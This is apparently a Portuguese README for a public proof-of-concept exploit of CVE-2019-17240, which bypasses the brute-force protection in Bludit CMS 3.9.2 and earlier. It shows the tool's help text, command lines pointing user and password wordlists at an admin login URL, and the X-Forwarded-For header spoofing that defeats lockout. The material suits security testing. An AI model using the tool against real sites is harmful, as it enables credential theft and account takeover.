
Bludit <= 3.9.2 - Bypass de Mitigação de Bruteforce de Autenticação Exploit/PoC
Código de Exploit para CVE-2019-17240 também conhecido como Bypass de Mitigação de Força Bruta do Bludit <= 3.9.2
Links do Exploit: [ExploitDB-48942] [PacketStorm]
Resultado esperado: Descobrir credenciais de login, contornando o mecanismo de força bruta no host executando Bludit <=3.9.2
Destinado apenas para fins educacionais e testes em ambientes corporativos.
Este exploit foi testado no Python 3.8.6
cfx: ~/bludit
→ ./exploit.py -h
usage: exploit.py [-h] [-l URL] [-u USERLIST] [-p PASSLIST]
Bludit <= 3.9.2 Auth Bruteforce Mitigation Bypass
optional arguments:
-h, --help show this help message and exit
-l URL, --url URL Path to Bludit (Example: http://127.0.0.1/admin/login.php)
-u USERLIST, --userlist USERLIST
Username Dictionary
-p PASSLIST, --passlist PASSLIST
Password Dictionary
Exploit Usage :
./exploit.py -l http://127.0.0.1/admin/login.php -u user.txt -p pass.txt
./exploit.py -l http://127.0.0.1/admin/login.php -u /Directory/user.txt -p /Directory/pass.txt
Instalação:
pip3 install pwn
pip3 install requests
Este exploit espera três entradas do usuário:
Uso do exploit onde o nome de usuário dentro de user.txt é mapeado contra cada senha dentro de pass.txt e enviado para o login:

Os valores são enviados no cabeçalho X-Forwarded-For a partir de pass.txt; se a lista contém um número menor de senhas, é provável que uma palavra seja bloqueada pelo servidor; nesse caso, o script mostrará a palavra bloqueada na saída:

Após login bem-sucedido, a seguinte saída com credenciais funcionais será mostrada:

Este é um exploit para a vulnerabilidade encontrada por Rastating no Bludit CMS.
Explicação da vulnerabilidade: https://rastating.github.io/bludit-brute-force-mitigation-bypass/.